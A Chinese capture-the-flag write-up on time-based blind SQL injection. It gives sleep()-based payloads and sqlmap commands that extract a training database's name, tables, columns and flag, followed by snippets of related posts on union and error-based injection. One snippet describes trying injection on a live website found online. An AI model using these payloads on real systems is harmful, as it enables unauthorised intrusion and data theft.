##利用函式sleep()讓伺服器休眠,通過休眠時間判斷執行的語句對錯,從而得到我們想要的資訊
1,判斷當前庫名的長度
and if (length(database())=8,0,sleep(5))#0
結果=8時網頁沒睡眠,可以判斷當前庫名有8個字元
2,猜庫名
and if (ascii(substr(database(),1,1))=115,0,sleep(5))
結果=115時網頁沒睡眠,可以判斷庫名第乙個字元對應的ascii碼為115 字元為s
判斷第二個字元
執行到最後得出全部字元為security,也就是當前庫名
第二個字元ascii等於101 字元為e
3,猜表名
security的第一張表的第乙個字元ascii為101,為字元e
4.手工注入知道了庫名,用sqlmap輔助操作查出表名
命令為:sqlmap.dy -u 「url」 --tables -d 「security」
5.知道表名了,查我們想要的表的字段
手工語句:and if((select ascii(substr((select column_name from information_schema.columns where table_name="zkaq"limit 0,1),1,1)))=101,0,sleep(5))
sqlmap命令為sqlmap.dy -u 「url」 --columns -t 「zkaq」
6.查字段內容
手工語句:and if((select ascii(substr((select zkaq from zkaq where flag=「10」),1,1)))=101,0,sleep(5))
sqlmap工具命令:sqlmap.py -u"" --dump -t 「zkaq」 -c 「flag」,
找到flag,本題完成
一次簡單手工注入
注入點http news.php?newsid 18 收集了下ip,不能sqlmap了,就只能手工了。經典 and 1 1 1 2 一直報錯,感覺是被過濾了,後面使用注釋符也不行 使用union select 1,2,3也報錯,確定不了字段數。成功payload union select 1,2,c...
一次簡單的純手工顯錯注入
注 這裡還要利用到了乙個函式group concat 意思是將查詢的結果併排 拼接一起展示,不然輸出點只能顯示乙個表名或者字段 1.利用and1 1 顯示正常,and 1 2 顯示錯誤頁面。證明有注入點 2。order by 語句查詢有幾個字段,為了後面使用聯合查詢 例如,order by 4 出錯...
記一次操蛋的mysql注入之旅
最近開始學習web安全的知識,剛好學完mysql注入這塊,趕緊找個 練練手,整個過程很順利,但是結果很操蛋。我還是個小菜鳥,各位大神看了輕噴.站點 馬賽克遮體 1.注入點檢測 and 1 1 結果正常 and 1 2 結果為空 勤奮的孩子運氣不會差,一出手就發現了注入點,下面就開始一步步開搞。2.猜...